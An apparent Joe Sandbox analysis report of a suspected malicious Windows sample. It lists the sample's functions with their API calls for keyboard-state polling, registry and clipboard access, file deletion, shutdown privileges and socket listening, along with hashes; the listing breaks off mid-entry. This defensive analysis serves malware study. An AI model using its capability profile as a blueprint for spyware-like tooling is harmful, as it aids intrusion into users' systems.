ANYCRLF), xrefs: 00AF12FB
UCP), xrefs: 00AF110D
CRLF), xrefs: 00AF12C1
LF), xrefs: 00AF12A4
LIMIT_MATCH=, xrefs: 00AF1170

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: c2a78bebdfb7536e131cdf9cf5671cc2ae4e46b3834e1721e79860a061d6a48a
Instruction ID: ec0f97d22cc0f18a2eef6fb21ebb370260b1d79c3828c4b5242f635f34d012f4
Opcode Fuzzy Hash: c2a78bebdfb7536e131cdf9cf5671cc2ae4e46b3834e1721e79860a061d6a48a
Instruction Fuzzy Hash: 58724F75E00219DBDB14CF99D8807FEB7B5FF44710F1481AAE949EB291EB349A81CB90

Function 00B0001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B00097
SetKeyboardState.USER32(?), ref: 00B00102
GetAsyncKeyState.USER32(000000A0), ref: 00B00122
GetKeyState.USER32(000000A0), ref: 00B00139
GetAsyncKeyState.USER32(000000A1), ref: 00B00168
GetKeyState.USER32(000000A1), ref: 00B00179
GetAsyncKeyState.USER32(00000011), ref: 00B001A5
GetKeyState.USER32(00000011), ref: 00B001B3
GetAsyncKeyState.USER32(00000012), ref: 00B001DC
GetKeyState.USER32(00000012), ref: 00B001EA
GetAsyncKeyState.USER32(0000005B), ref: 00B00213
GetKeyState.USER32(0000005B), ref: 00B00221

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
Instruction ID: b2cd4e7762166aef453f87dced782564d29f0c116dcfc89a6c175bece19fc58f
Opcode Fuzzy Hash: e81e476bc266266e2d3330e5f8ec917a42096efa7a9efba22f1665900051ee5b
Instruction Fuzzy Hash: 3651C63091478829FB35FBA088557EABFF4DF12380F0845DA99C6575C2EAA49B8CC761

Function 00B203DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B204AC

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B2054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B205E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B20822
RegCloseKey.ADVAPI32(00000000), ref: 00B2082F

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f510e3acccbd49271c3f6827517e9fbe52634dfc08cf9c8c3569192a7a7b468f
Instruction ID: e434346e518241db36337bcdda1e80294d2edcbff5beb8ee1f24612d70ead7dc
Opcode Fuzzy Hash: f510e3acccbd49271c3f6827517e9fbe52634dfc08cf9c8c3569192a7a7b468f
Instruction Fuzzy Hash: 85E14E31604214AFCB14EF24D995E6BBBE9EF89714F04856DF449DB2A2DB30ED01CB91

Function 00B183BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

CoInitialize.OLE32 ref: 00B18403
CoUninitialize.OLE32 ref: 00B1840E
CoCreateInstance.OLE32(?,00000000,00000017,00B32BEC,?), ref: 00B1846E
IIDFromString.OLE32(?,?), ref: 00B184E1
VariantInit.OLEAUT32(?), ref: 00B1857B
VariantClear.OLEAUT32(?), ref: 00B185DC

Strings

NULL Pointer assignment, xrefs: 00B184B3
Failed to create object, xrefs: 00B18479, 00B1852F
Invalid parameter, xrefs: 00B184FA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 4b04b0381398761a25a80690084df1f576395482127921017911532e898ccc6a
Instruction ID: a76d5722e1107d06f36e7fc2d379d720aa109b5c213f85ae8f6fd01974bd50dd
Opcode Fuzzy Hash: 4b04b0381398761a25a80690084df1f576395482127921017911532e898ccc6a
Instruction Fuzzy Hash: CA61BC706083129FC710DF54D888BAAB7E9FF59754F404499F9819B2A1CF70ED88CB92

Function 00B14164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00B1418B
EmptyClipboard.USER32 ref: 00B14191
GlobalAlloc.KERNEL32(00000002,?), ref: 00B141A6
CloseClipboard.USER32 ref: 00B14245

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: cc6f7f835fda4a95eb701ea0cca98cba23e651326fad70cb087d56357eda1dae
Instruction ID: be76f0e56c7a2f5089533de491a4ae8ac0367084f97a6dbf9e8baad553aca18a
Opcode Fuzzy Hash: cc6f7f835fda4a95eb701ea0cca98cba23e651326fad70cb087d56357eda1dae
Instruction Fuzzy Hash: 9B21A135200211AFDB21AF64ED49B7E7BB8EF05710F148069F946DB2A1DF74AC42CB94

Function 00B037EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

Part of subcall function 00B04A31: GetFileAttributesW.KERNEL32(?,00B0370B), ref: 00B04A32

FindFirstFileW.KERNEL32(?,?), ref: 00B038A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B0394B
MoveFileW.KERNEL32(?,?), ref: 00B0395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B0397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B039B9

Strings

\*.*, xrefs: 00B0384E, 00B03857, 00B0386C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 14e1d5abad1cb3760ce0feca3d5a7157b54e2954845aa2d8a4edc862ec24a8a8
Instruction ID: 12bf18c7be85b017b37d4086ef1d4932e19f59ca83f79953eaef61ea1a5bed4a
Opcode Fuzzy Hash: 14e1d5abad1cb3760ce0feca3d5a7157b54e2954845aa2d8a4edc862ec24a8a8
Instruction Fuzzy Hash: 94514D3180514D9ACB15EBA0DA969FEBBF9AF16300F6040A9E406771D2EF616F09CB61

Function 00B0F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B0F440
Sleep.KERNEL32(0000000A), ref: 00B0F470
_wcscmp.LIBCMT ref: 00B0F484
_wcscmp.LIBCMT ref: 00B0F49F
FindNextFileW.KERNEL32(?,?), ref: 00B0F53D
FindClose.KERNEL32(00000000), ref: 00B0F553

Strings

*.*, xrefs: 00B0F425

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: ea09f31d199f2a8bedf3bf6baaf53d992c095f1aa6ec6310029ad0379f669e41
Instruction ID: 68f0bb43e30793368ac4cb3e7d1742a6dae3cf8cd3e2d2a37d39c2685c47ba50
Opcode Fuzzy Hash: ea09f31d199f2a8bedf3bf6baaf53d992c095f1aa6ec6310029ad0379f669e41
Instruction Fuzzy Hash: F3414A71A0021AABCF24DF64DC49AFEBBF4FF15310F1445AAE815A72E1DB309A45CB50

Function 00AB5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AB58A5
_memmove.LIBCMT ref: 00AB58F5
_memmove.LIBCMT ref: 00AB595B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8e6314f6ded2df726ccaeb77f7080d85eded8f88d6afe9746a9c0072697ab410
Instruction ID: 8ea199db77b5759793d10aaef3d85f345e611435f5826562686b8b23fd5c1a00
Opcode Fuzzy Hash: 8e6314f6ded2df726ccaeb77f7080d85eded8f88d6afe9746a9c0072697ab410
Instruction Fuzzy Hash: 95124770E00609DFDF14DFA5DA81AEEB7B9FF48300F104569E846A7292EB36A915CB50

Function 00B03B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

Part of subcall function 00B04A31: GetFileAttributesW.KERNEL32(?,00B0370B), ref: 00B04A32

FindFirstFileW.KERNEL32(?,?), ref: 00B03B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B03BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B03BEA
FindClose.KERNEL32(00000000), ref: 00B03C01
FindClose.KERNEL32(00000000), ref: 00B03C0A

Strings

\*.*, xrefs: 00B03B5B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: dbede00bf71607191bc11e16c043bf8aace0872d41582226f0f27d39f6ae89fa
Instruction ID: 3cbf7879d5f1f2586f04319318f07cc3b9752976310fd1b7b7b2989cd8c4f835
Opcode Fuzzy Hash: dbede00bf71607191bc11e16c043bf8aace0872d41582226f0f27d39f6ae89fa
Instruction Fuzzy Hash: 31318B310083859BC311EF64C9959AFBBECAE96314F400E6DF4D5931E2EB21DA09C7A7

Function 00B051BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF882B
Part of subcall function 00AF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8858
Part of subcall function 00AF87E1: GetLastError.KERNEL32 ref: 00AF8865

ExitWindowsEx.USER32(?,00000000), ref: 00B051F9

Strings

SeShutdownPrivilege, xrefs: 00B051C9
, xrefs: 00B051E7
@, xrefs: 00B051EC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 8220eee48974886f81753f58b55876f61cbc402b4b3ccf672a6b950d7005d401
Instruction ID: 9e5d168a7e362d7b3b65adda89d460369c1a01ec8390f6d03eb345b095047bb7
Opcode Fuzzy Hash: 8220eee48974886f81753f58b55876f61cbc402b4b3ccf672a6b950d7005d401
Instruction Fuzzy Hash: 7C012B35791616ABF73866689C8AFBBBAE8EF05740F2005F1F903E28D2DD515C418DA0

Function 00B16283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B162DC
WSAGetLastError.WSOCK32(00000000), ref: 00B162EB
bind.WSOCK32(00000000,?,00000010), ref: 00B16307
listen.WSOCK32(00000000,00000005), ref: 00B16316
WSAGetLastError.WSOCK32(00000000), ref: 00B16330
closesocket.WSOCK32(00000000,00000000), ref: 00B16344

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: ccf71469c1b58a83c9cd1985d6dcbd29bd6abfbead69d17c59917d2effee072d
Instruction ID: e95952d92ea043b9a709344b7ae774b73d8314a96f49d9dfc63dc61b7d963c4c
Opcode Fuzzy Hash: ccf71469c1b58a83c9cd1985d6dcbd29bd6abfbead69d17c59917d2effee072d
Instruction Fuzzy Hash: 6A2191316002059FCB10EF68D945B7EB7F9EF49720F5442A9F926A72E1CB70AD41CB61

Function 00AB5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

_memmove.LIBCMT ref: 00AF0258
_memmove.LIBCMT ref: 00AF036D
_memmove.LIBCMT ref: 00AF0414

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 9c03ab93032f4ab0d9880eb78982c2f6e1bd3d53509295195c11637113dd7939
Instruction ID: 64697ae5ce9d8af1693e7eae6b3c50f73243c36dc4f8bcff0b301e2dbc0aa747
Opcode Fuzzy Hash: 9c03ab93032f4ab0d9880eb78982c2f6e1bd3d53509295195c11637113dd7939
Instruction Fuzzy Hash: 76028E70A00209DFCF14DFA4D991ABEBBB9EF44300F1580A9F906DB296EB35D954CB91

Function 00AA1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00AA19FA
GetSysColor.USER32(0000000F), ref: 00AA1A4E
SetBkColor.GDI32(?,00000000), ref: 00AA1A61

Part of subcall function 00AA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: cac55550220f2273d06d9720e8b3aadf70189d94eeed7100c94b10d4e4c7a0e1
Instruction ID: 86ec596a5a941c94e8c30e551d78a0528cdc811c549b32cdcc3429d5826e2c20
Opcode Fuzzy Hash: cac55550220f2273d06d9720e8b3aadf70189d94eeed7100c94b10d4e4c7a0e1
Instruction Fuzzy Hash: 76A12471116594FEE638AB289D58EBF3AADDB433C1F15021AF503D72D2CB249D01D2B2

Function 00B0BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0BCE6
_wcscmp.LIBCMT ref: 00B0BD16
_wcscmp.LIBCMT ref: 00B0BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00B0BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B0BD6C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 6f588fcecae24d6dc351a57432a9fbfc74fda3074945b9519b33ea35c461f7de
Instruction ID: 16baf6a86d64da674a1a9be3bc87538c700c128a18960d67f1823dc869f94e69
Opcode Fuzzy Hash: 6f588fcecae24d6dc351a57432a9fbfc74fda3074945b9519b33ea35c461f7de
Instruction Fuzzy Hash: A7516B356046029FD714DF68C590EAAF7E8EF4A320F1046ADF966873A1DB30ED05CB91

Function 00B16747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B17DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B1679E
WSAGetLastError.WSOCK32(00000000), ref: 00B167C7
bind.WSOCK32(00000000,?,00000010), ref: 00B16800
WSAGetLastError.WSOCK32(00000000), ref: 00B1680D
closesocket.WSOCK32(00000000,00000000), ref: 00B16821

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: bfd5779fe8c95672bb392fcd7a0349aaae686693b7b856a784aea15c053271bc
Instruction ID: 70b1ba0ac398903edc42b575a65103a98d11f3ca79a403891638e9532c09ac28
Opcode Fuzzy Hash: bfd5779fe8c95672bb392fcd7a0349aaae686693b7b856a784aea15c053271bc
Instruction Fuzzy Hash: 9C41BF75A00210AFEB10AF64CD86F7E77E8DB0AB14F44856CFA15AB3D2CB789D018791

Function 00B25376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B253C5
IsWindowEnabled.USER32 ref: 00B253D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00B253E0
IsIconic.USER32 ref: 00B253EE
IsZoomed.USER32 ref: 00B253FC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 326932e70d6b647869d06e32ce7d40b34cd50fb860d9d521e65b1f18f42b5ce7
Instruction ID: a74fbfbbb0b0275007af6b05de176ad96a74a37d3526cf71cd90323301111169
Opcode Fuzzy Hash: 326932e70d6b647869d06e32ce7d40b34cd50fb860d9d521e65b1f18f42b5ce7
Instruction Fuzzy Hash: AB1186317005215BDB31AF26AC44A6ABBE9EF457A1B404479F84AD7251CB74DD0286A4

Function 00AF80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF80C0
